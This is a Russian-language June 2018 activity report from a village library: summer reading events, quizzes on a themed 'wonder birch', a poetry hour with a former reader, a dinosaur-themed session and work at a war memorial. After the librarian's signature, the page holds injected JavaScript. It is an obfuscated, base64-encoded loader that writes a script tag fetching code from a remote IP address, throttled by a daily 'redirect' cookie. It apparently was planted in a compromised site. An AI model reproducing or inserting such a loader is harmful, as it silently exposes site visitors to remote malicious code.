ОТЧЕТ о проделанной работе Колбинской библиотеки за июнь 2018 года

Работа в Колбинской библиотеке началась с 3 июня. В этот день к нам пришли на открытие летних чтений наши друзья. Шумно и весело начались библиотечные «каникулы со вкусом лета».  Ребята приняли участие в викторинах, шуточных конкурсах и розыгрышах. А ещё у нас стартовала акция «100 страниц лета». Участник, прочитавший наибольшее количество книг получит приз. (участники делятся на три возрастные группы).

в очередь за книгой

Также в Колбинской библиотеке  6 июня выросло чудо-берёза. Дерево необычное. Каждую неделю на ней поспевают  тематические плоды.

Так, например, первую неделю «поспел» Пушкин. Его герои (рыбка, белочка, царевна-лебедь и русалочка) задавали вопросы читателям. Некоторые ответы приходилось искать в книгах.  Выставка пушкинских сказок была под рукой. А золотая рыбка могла исполнить одно желание – сделать вас Властелином морей.

Вторую неделю наша берёза цвела триколором нашей Родины.  А на третьей неделе – Динозаврами.

4 июня в Колбинской библиотеке читали все. Для акции «Читаем вслух» были выбраны красноярские авторы Роман Солнцев и Зорий Яхнин. А также по просьбе читателей  сборник стихов «Новый Енисейский литератор»

А ещё в июне в нашей библиотеке прошла встреча со «старым» другом. К нам в гости приехала бывшая читательница, поэтесса – Маша Дубинина. И по этому случаю мы провели  час поэзии «Поэт  — это голос страны». Её стихи есть в нашей библиотеке. Но то, были детские пробы пера, теперь Маша учится на филфаке и её стихи повзрослели  вместе с ней. Вот отрывок из одного из них.

….Ахматова и Блок отчасти
Слагали строчки о любви,
Но разрывали их на части
Любовь и преданность к Руси.
С Цветаевой ничто не схоже.
Её стихи – душевный крик.
Но и других поэтов тоже
Нельзя сравнить. Поэт Велик!..

В июне в Колбинской библиотеке стартовал цикл «научных экспедиций» — «Путешественники во времени».

С первой экспедицией мы отправились к динозаврам (По следам динозавров). Участники смогли не только познакомиться с динозаврами через книгу и мультфильм, они смогли принять участие в раскопках скелета велоцираптора, познакомиться поближе с его повадками.  А также придумать новые виды динозавров.

22 июня в День памяти и скорби совместно с ДК привели в порядок Памятник участникам ВОВ, митинг у Памятника.

зав. библиотекой Курдяева М.Ю.

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}